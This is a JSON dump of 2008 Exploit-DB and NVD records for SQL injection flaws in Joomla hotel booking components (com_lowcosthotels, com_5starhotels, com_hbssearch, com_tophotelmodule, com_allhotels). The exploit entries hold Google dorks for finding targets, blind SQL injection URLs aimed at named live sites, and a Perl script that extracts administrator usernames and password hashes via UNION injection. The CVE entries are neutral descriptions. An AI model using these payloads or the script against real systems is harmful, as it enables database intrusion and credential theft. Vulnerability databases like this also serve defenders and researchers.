{"id": "EDB-ID:7567", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component com_lowcosthotels id Blind SQL Injection Vuln", "description": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865,CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform", "published": "2008-12-23T00:00:00", "modified": "2008-12-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7567/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-5864", "CVE-2008-5865", "CVE-2008-5874", "CVE-2008-5875"], "lastseen": "2016-02-01T03:30:34", "viewCount": 9, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-02-01T03:30:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5875", "CVE-2008-5865", "CVE-2008-5864", "CVE-2008-5874"]}, {"type": "exploitdb", "idList": ["EDB-ID:7575", "EDB-ID:7538", "EDB-ID:7539", "EDB-ID:7568"]}], "modified": "2016-02-01T03:30:34", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/7567/", "sourceData": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability\n___________________________________\n\nAuthor: Hussin X\n\nHome : www.IQ-TY.com & www.TrYaG.cc\n\n___________________________________\n\nscript : http://www.joomlahbs.com/\n\nDorK : inurl:index.php?option=com_lowcosthotels\n\nDemo :\n_______\n\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5\n\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4\n\n\nor\n\n\nhttp://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5\n\nhttp://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|\n|_____________________________________________________________________\n\n _____ ____ __ __ _ ____ ____ ____\n|_ _| | _ \\ \\ \\ / / / \\ / ___| / ___| / ___|\n | | | |_) | \\ V / / _ \\ | | _ | | | |\n | | | _ < | | / ___ \\ | |_| | _ | |___ | |___\n |_| |_| \\_\\ |_| /_/ \\_\\ \\____| (_) \\____| \\____|\n\n# milw0rm.com [2008-12-23]\n", "osvdbidlist": ["51548", "50947"]}

{"exploitdb": [{"lastseen": "2016-02-01T03:31:34", "description": "Joomla Component 5starhotels (id) SQL Injection Exploit. CVE-2008-5864,CVE-2008-5865,CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform", "published": "2008-12-24T00:00:00", "type": "exploitdb", "title": "Joomla Component 5starhotels id SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865", "CVE-2008-5874", "CVE-2008-5875"], "modified": "2008-12-24T00:00:00", "id": "EDB-ID:7575", "href": "https://www.exploit-db.com/exploits/7575/", "sourceData": "#!/usr/bin/perl -w\n \n \n#Joomla com_5starhotels Sql injection#\n########################################\n#[~] Author : EcHoLL\n#[~] www.warezturk.org www.tahribat.com\n#[~] Greetz : Black_label TURK Godlike Nitrous\n \n#[!] Module_Name: com_5starhotels\n#[!] Script_Name: Joomla\n#[!] Google_Dork: inurl:\"com_5starhotels\"\n########################################\n \n \nsystem(\"color FF0000\");\nsystem(\"Nohacking\");\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t| Turkish Securtiy Team |\\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\\n\\n\";\nprint \"\\t\\t| Coded by: EcHoLL www.warezturk.org |\\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\n \nuse LWP::UserAgent;\n \nprint \"\\nSite ismi Target page:[http://wwww.site.com/path/]: \";\n chomp(my $target=<STDIN>);\n \n$column_name=\"concat(username,0x3a,password)\";\n$table_name=\"jos_users\";\n \n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n \n$host = $target . \"/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,\".$column_name.\"+from/**/\".$table_name.\"--\";\n$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){\n print \"\\n[+] Admin Hash : $1\\n\\n\";\n print \"# Tebrikler Exploit Calisti! #\\n\\n\";\n}\nelse{print \"\\n[-] Exploit Bulunamad\u0102\u0084\u00c2\u0105...\\n\";\n}\n\n# milw0rm.com [2008-12-24]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7575/"}, {"lastseen": "2016-02-01T03:27:03", "description": "Joomla Component com_hbssearch 1.0 Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865. Webapps exploit for php platform", "published": "2008-12-21T00:00:00", "type": "exploitdb", "title": "Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865"], "modified": "2008-12-21T00:00:00", "id": "EDB-ID:7538", "href": "https://www.exploit-db.com/exploits/7538/", "sourceData": "#############################################################\r\nJoomla Component com_hbssearch(r_type) Blind SQL-injection\r\n#############################################################\r\n\r\n\r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Kosova Hackers Group [www.khg-crew.ws]\r\n#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n----------------------------------------\r\n#[!] <author>Joomla HBS</author>\r\n#[!] <client>Administrator</client>\r\n#[!] <authorEmail>dev@joomlahbs.com</authorEmail>\r\n#[!] <authorUrl>http://joomlahbs.com</authorUrl>\r\n#[!] <version>1.0.0</version>\r\n###################################################\r\n\r\nExample:\r\nhttp://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]\r\n\r\n\r\nLiveDEMO:\r\n\r\nhttp://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->FALSE\r\n\r\nhttp://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetails&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54 -->TRUE\r\n\r\n\r\n##############################\r\n#[!] Proud 2 be Albanian\r\n#[!] Proud 2 be Muslim\r\n#[!] United States of Albania\r\n##############################\r\n\r\n# milw0rm.com [2008-12-21]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7538/"}, {"lastseen": "2016-02-01T03:27:10", "description": "Joomla Component com_tophotelmodule 1.0 Blind SQL Injection Vuln. CVE-2008-5864,CVE-2008-5865. Webapps exploit for php platform", "published": "2008-12-21T00:00:00", "type": "exploitdb", "title": "Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5864", "CVE-2008-5865"], "modified": "2008-12-21T00:00:00", "id": "EDB-ID:7539", "href": "https://www.exploit-db.com/exploits/7539/", "sourceData": "#############################################################\r\nJoomla Component com_tophotelmodule(id) Blind SQL-injection\r\n#############################################################\r\n \r\n \r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Kosova Hackers Group [www.khg-crew.ws]\r\n#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n----------------------------------------\r\n#[!] <name>Top Hotel Module</name>\r\n#[!] <creationDate>06/07/2008</creationDate>\r\n#[!] <author>Joomla HBS</author>\r\n#[!] <authorEmail>dev@joomlahbs.com</authorEmail>\r\n#[!] <authorUrl>http://joomlahbs.com</authorUrl>\r\n#[!] <version>1.0.0</version>\r\n###################################################\r\n \r\nExample:\r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]\r\n \r\n \r\nLiveDEMO:\r\n \r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE\r\n \r\nhttp://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE\r\n \r\n \r\n##############################\r\n#[!] Proud 2 be Albanian\r\n#[!] Proud 2 be Muslim\r\n#[!] United States of Albania\r\n##############################\r\n\r\n# milw0rm.com [2008-12-21]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7539/"}, {"lastseen": "2016-02-01T03:30:41", "description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability. CVE-2008-5874,CVE-2008-5875. Webapps exploit for php platform", "published": "2008-12-23T00:00:00", "type": "exploitdb", "title": "Joomla Component com_allhotels id Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5874", "CVE-2008-5875"], "modified": "2008-12-23T00:00:00", "id": "EDB-ID:7568", "href": "https://www.exploit-db.com/exploits/7568/", "sourceData": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability\n___________________________________\n\nAuthor: Hussin X\n\nHome : www.IQ-TY.com & www.TrYaG.cc\n\n___________________________________\n\nscript : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/\n\nDorK : inurl:index.php?option=com_allhotels\n\nDemo :\n_______\n\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5\n\nhttp://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab\n|\n| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|\n|_____________________________________________________________________\n\n _____ ____ __ __ _ ____ ____ ____\n|_ _| | _ \\ \\ \\ / / / \\ / ___| / ___| / ___|\n | | | |_) | \\ V / / _ \\ | | _ | | | |\n | | | _ < | | / ___ \\ | |_| | _ | |___ | |___\n |_| |_| \\_\\ |_| /_/ \\_\\ \\____| (_) \\____| \\____|\n\n# milw0rm.com [2008-12-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7568/"}], "cve": [{"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the Top Hotel (com_tophotelmodule) component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-06T17:30:00", "title": "CVE-2008-5864", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5864"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:com_tophotelmodule:1.0.0", "cpe:/a:joomlahbs:hotel_booking_reservation_system:1.0.0"], "id": "CVE-2008-5864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5864", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_tophotelmodule:1.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the r_type parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-06T17:30:00", "title": "CVE-2008-5865", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5865"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:hotel_booking_reservation_system:1.0.0"], "id": "CVE-2008-5865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5865", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:1.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in the com_lowcosthotels component in the Hotel Booking Reservation System (aka HBS) for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php.", "edition": 3, "cvss3": {}, "published": "2009-01-08T19:30:00", "title": "CVE-2008-5875", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5875"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:hotel_booking_reservation_system:_nil_", "cpe:/a:joomlahbs:com_lowcosthotels:_nil_"], "id": "CVE-2008-5875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5875", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_lowcosthotels:_nil_:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:04", "description": "Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS) for Joomla! allow remote attackers to execute arbitrary SQL commands via the id parameter in a showhoteldetails action to index.php in the (1) com_allhotels or (2) com_5starhotels module. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2009-01-08T19:30:00", "title": "CVE-2008-5874", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5874"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:joomlahbs:com_5starhotels:_nil_", "cpe:/a:joomlahbs:hotel_booking_reservation_system:_nil_", "cpe:/a:joomlahbs:com_allhotels:_nil_"], "id": "CVE-2008-5874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomlahbs:hotel_booking_reservation_system:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_allhotels:_nil_:*:*:*:*:*:*:*", "cpe:2.3:a:joomlahbs:com_5starhotels:_nil_:*:*:*:*:*:*:*"]}]}